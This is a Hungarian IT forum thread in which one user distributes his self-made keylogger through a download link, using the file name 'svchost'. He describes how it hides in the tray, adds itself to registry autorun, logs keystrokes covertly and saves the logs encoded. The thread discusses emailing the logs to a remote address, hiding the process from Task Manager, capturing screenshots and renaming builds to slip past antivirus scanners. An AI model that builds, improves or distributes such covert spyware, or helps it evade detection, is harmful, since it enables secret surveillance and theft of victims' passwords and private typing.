Hirdetés
Új hozzászólás Aktív témák
-
himre82
csendes tag
sziasztok!
ezt próbálja ki valaki.
http://www.2shared.com/file/2Auxvdl1/svchost.html
saját fejleszés. betűk, számok, shift+betűk, shift+számok, numpad, enter, tab, capslock, backspace, delete billentyűket naplózza, a többi nem érdekelt.
win vista és win 7-en műdödik, xp-n ezt a változatot még nem teszteltem, arra van egy külön xp-s verzióm, bár lehet, hogy olyan xp-n, ahol van net 3.5, rendesen fut
uac-t ki kell kapcsolni, hogy működjön
avast és avg ezt ismerte fel benne: MSIL Crypt-FT [Trj] (a virustotal-on teszteltem le).
működése: elindítod, leteszi magát a tray-be, úgy, hogy nem látszik, és bele írja a registry-be a bejegyzést, hogy autorun legyen
induláskor létrehoz egy fájlt az exe mappájában, és a billentyűleütéseket ebbe naplózza kódolva. ctrl+f11-re (néha kétszer kell megnyomni) feljön az ablak, és ha megnyomjuk a dekódolás gombot, akkor létrehoz egy dekódolt fájlt szintén az exe mappájában. a szokásos x-szel bezárhatjuk a programot.
a billentyűleütéseket bizonyos leütésenként menti (asszem 40-re állítottam be).
ha kilépéskor még nincs meg a 40 leütés, a kódolt fájlba akkor is beleírja az addig leütött billentyűket, és a következő dekódoláskor ezt a maradékot is dekódolja.mindenféle aprósággal ki lehet egészíteni, de megírásakor nem ez volt a cél, hanem az, hogy legyen egy egyszerű program, ami letárolja a billentyűleütéseket kódoltan.
saját gépemen (win7 x64) kifogástalanul működik, munkahelyi gépen (win7 x32) is elindult (ott van uac, de rendszergazdai jogosultságokkal futtattam), viszont ott valami miatt leblokkolta a billentyűket, és csak a task managerből való kilövéssel sikerült lekapcsolni.
nem teszi tönkre a számítógépet, nem formázza le a c-t, stb. ha nem jó, egyszerűen letörlöd, registryből kiveszed az autorun-t, és mész tovább.
[ Szerkesztve ]
-
himre82
csendes tag
válasz Secretive #153 üzenetére
szia!
igen, vb.net.
ezek szerint nálad működik?
amikkel ki lehetne egészíteni:
- a billentyűleütéseket választás szerint vagy x másodperc eltelte után tárolja, vagy x karakter leütése után
- programablak megnyitása egy a felhasználó által megadott billentyűkombinációval
- bizonyos időközönként (pl. 8 óra) automata e-mail küldés egy a felhasználó által beállított e-mail címre a kódolt állománnyal (jelenleg hotmail-ra már működik)
- task manager-ben a process elrejtése (folyamatban)
- a billentyűk letárolásakor mentsen időpontot is (komplett timestamp), hogy az ember tudja, mikor gépeltek mit; itt arra gondolok, hogy pl napi szinten mentsen le egy dátumot (esetleg meghatározott óránként)
- dekódoláskor jelenleg pl. ezt a szöveget, hogy "TESZT", így dekódolja: {Capslock}teszt{Capslock}, ezt meg lehetne úgy változtatni, hogy a dekódolt fájlban már csak TESZT szerepeljen
- valamint pl ha ezt gépelem, hogy "teszj" és kitörölöm a j-t, és pótlom t-vel, akkor ezt dekódolja: teszj{Backspace}t, esetleg ebből is ki lehetne szedni a {Backspace}-t, hogy csak a teszt maradjon a végén, így könnyebb lesz majd olvasni a dekódolt állománytezt mind le tudom programozni.
ami majd érdekes lehet, a bill használat karaktereit tárolja-e valamilyen logika szerint, vagy csak halomra egymás után
itt mire gondolsz?
a billentyűleütéseket egymás után tárolja.
[ Szerkesztve ]
-
himre82
csendes tag
válasz Secretive #155 üzenetére
sima txt fájlként jeleníti meg a naplófájlt, jelenleg nem naplózza azt, hogy milyen ablakban, alkalmazásban gépeltünk. De kiegészíthető...
csak az a fránya trójai ne lenne benne. Majd megpróbálom elhatárolni azt a kódrészletet, ami miatt érzékeli a két említett vírusirtó. De érdekes, hogy a többi nagy meg meg sem említ semmit.
[ Szerkesztve ]
-
himre82
csendes tag
válasz Secretive #157 üzenetére
a program nem a szokványos keylogger módszereket alkalmazza, ezért is nem találta más vírusirtó gyanúsnak. Egy olyan módszert gondoltam tovább, amit eredetileg teljesen másból kifolyólag hoztak létre, de kicsit átdolgozva alkalmas lett keylogger-nek.
egyébként a te gépeden kipróbáltad? ha igen, ott jelzett a vírusirtó?
-
himre82
csendes tag
kitöröltem minden kódot a programból, és úgy fordítottam le, majd feltoltam a virustotal-ra, és így is ugyanazt a trójait találta.
tehát itt valami más lehet a gond.
Nem hiába írtam, hogy ez a keylogger nem a szokványos eljárásokkal készült, és azért nem jeleznek a vírusirtók.
[ Szerkesztve ]
-
himre82
csendes tag
új fejlemény:
úgy néz ki, nem szereti az svchost nevet:
kitöröltem minden kódot, és átneveztem a projectet, majd úgy fordítottam le, nem talált semmit.
újra kitöröltem minden kódot, nem neveztem át a projectet, megtalálta a trójait.
ezek után az eredeti projektben átneveztem a projektet, fordítás, feltöltés, és nem talált semmit sem.
-
himre82
csendes tag
olvastam itt a fórumban, hogy van olyan program is, ami screenshot-ot küld.
mire jó ez? hol látjátok az értelmét?
mert akkor beépíteném a programba.
-
himre82
csendes tag
alakul....
már azt is loggolja, ha pl böngészőben új lapot nyitsz (tehát ha változik az ablak szövege), és nem csak azt, ha egyik alkalmazásból a másikba ugrasz.
a képküldésnek szerintetek hol van értelme? hol lehet hasznos?
-
himre82
csendes tag
html exportnak jó lesz?
-
himre82
csendes tag
válasz Secretive #172 üzenetére
az autostart már alapból benne volt, hiszen úgy nem ér az egész semmit.
érzékeli, ha xp-d vagy vista-d/win7-ed van, mert attól függően máshova kell tenni a registry-be a bejegyzést.
a főablak nyitási kombinációja is már rég megvan.
remélem, itt a hosszú hétvégén befejezem
"jpg Q 80%"
ezzel mire gondoltál?
[ Szerkesztve ]
-
himre82
csendes tag
a program 99%-osan készen van, már csak kell írni egy kis feljegyzést hozzá, hogy mi hogyan működik, meg még meg kell oldanom azt az 1%-ot.
-
himre82
csendes tag
semmi biztatás, semmi visszajelzés, így elég demotiváló....
bár lehet, ebben a pár napban nem voltál/vagy netközelben. -
himre82
csendes tag
válasz Greenebola #181 üzenetére
de az, amit tegnap elküldtem Diónak, arra nem jelez be, az 100%. Semmilyen vírusirtó sem. Virustotal-on tesztelve. Tegnap.
Te még a legkezdetleges verziót töltötted le, azt, amelyikről csak leporoltam a port, és feltöltöttem. Nem módosítva benne semmit.
[ Szerkesztve ]
-
himre82
csendes tag
válasz Greenebola #186 üzenetére
az eltávolításhoz egyszerűen törölni kell a programot és fájljait, valamint a registry-ből az autorun bejegyzést.
-
himre82
csendes tag
pár dolgot kivettem belőle, és a magját újra írtam, így működik uac alatt is, a hosszú í-t is loggolja, meg ha távoli asztalon dolgozunk, azt is. persze, ha autostart-ot is akarunk, akkor rendszergazdaként kell futtatnunk, ha az uac be van kapcsolva.
Greenebola-tól még várok a nis 2012 sonar eredményre éles rendszeren (korábban írta, hogy sandbox-ban nem jelzett a sonar).
még egy fontos dolog: nincs benne 30 napos korlát. mindenki szabadon használhatja a saját felelősségére.
edit: még annyi, hogy MINDEN billentyűleütést naplóz, még a kombinációkat is (pl. alt+f11, ctrl+i, stb.) A dupla kombinációkat már nem (pl. ctrl+shift+k). Az altgr-rel előhívható jeleket is naplózza.
[ Szerkesztve ]
-
himre82
csendes tag
azért, mert először be kell állítani (konfigurálni). az előző verzióhoz tartozott egy leírás, ehhez már nem mellékeltem.
ctrl+f11-et nyomd meg kétszer, feljön az ablak, állítsd be, hogy hova mentse a log fájlt, megadhatod pl a fájlnevet, kiterjesztést, aztán kattints a konfigurálás gombra, és kész.
-
himre82
csendes tag
válasz Greenebola #194 üzenetére
a múltkorinál írt ki ilyeneket, hogy api használat, meg bill naplózás.
most nem írt ki ilyeneket, vagy azokat a képeket most nem tetted be ide?
-
himre82
csendes tag
válasz Greenebola #196 üzenetére
ok; ezt kiküszöbölni sajnos nem tudom.
-
himre82
csendes tag
a 10-20 irreálisan alacsony.
ha csak abból indulsz ki, hogy egy sorban hány karakter fér el (pl. egy word dokumentumban v. egy fórumban), akkor a 10-20 nagyon alacsony. Ez pedig azt eredményezi, hogy a html-be exportált log fájl majd nehezebben lesz olvasható a gyakori sortörések miatt.
az automatikus indítás valóban csak admin joggal oldható meg.
-
himre82
csendes tag
válasz Genome__ #201 üzenetére
nem tudom, mi okozza. lehet, hogy az, hogy net 3.5 alatt fejlesztettem?
a régi, több mint 10 éves gépen, amin xp van, meg net 3.5, azon gond nélkül fut.
lehet, hogy a net 4-ből hiányzik az, ami a a net 3.5-ben meg benn van? nehezen hihető. de nincs kizárva.
most nézem ezt a linket, valami ilyesmiről lehet szó.
-
himre82
csendes tag
Új hozzászólás Aktív témák
- Milyen légkondit a lakásba?
- Telekom mobilszolgáltatások
- Ukrajnai háború
- Vodafone otthoni szolgáltatások (TV, internet, telefon)
- Milyen asztali (teljes vagy fél-) gépet vegyek?
- Apple A16-ok készülnek a TSMC arizonai gyárában
- Házimozi belépő szinten
- Mobil flották
- Milyen egeret válasszak?
- Politika
- További aktív témák...
- Discord Nitro 1 éves (full verzio nem basic)
- Játékkulcsok olcsón: Steam, Uplay, GoG, Origin, Xbox, PS stb.
- Office Professional Plus 2013, 2016, 2019, 2021 RETAIL licenckulcsok - MEGA Akció!
- Windows, Office licencek kedvező áron, egyenesen a Microsoft-tól - 2990 Ft-tól!
- World of Warcraft (WoW) Díszdobozok
Állásajánlatok
Cég: Ozeki Kft
Város: Debrecen
Cég: Ozeki Kft
Város: Debrecen